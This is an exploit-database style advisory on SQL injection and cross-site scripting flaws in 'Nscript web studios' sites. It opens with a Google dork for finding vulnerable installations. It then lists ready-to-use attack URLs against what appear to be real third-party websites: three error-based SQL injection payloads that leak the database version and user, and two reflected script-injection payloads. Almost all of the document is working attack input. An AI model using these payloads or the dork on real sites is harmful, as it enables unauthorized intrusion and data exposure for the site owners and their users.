#Exploit Title: Nscript web studios – SQL Injection and XSS Vulnerability
#Date: 2020-08-16
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: nscript.com
#Google Dork: "Powered by : Nscript web studios"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: https://nscript.com/portfolio
SQL Injection
Demo 1: https://xtendgifting.com/products.php?pro_id=-2751+and+extractvalue(rand(),concat(0x7e,version(),0x3a,user()))--%20-&cat_id=&parent=
Demo 2:http://apjsingapore.com/bollywood.php?coll=DIVINE%20COLLECTIONS&cat=Div_Articles%27%20%20and+extractvalue(rand(),concat(0x7e,version(),0x3a,user()))--%20-
Demo 3: http://www.vgihs.edu.in/courses.php?c_type=1%20and+extractvalue(rand(),concat(0x7e,version(),user()))--
#############################################
Cross Site Scripting (XSS)
Demo: https://xtendgifting.com/products-listing.php?s=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&no_d=1
Demo: http://apjsingapore.com//bollywood.php?s=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************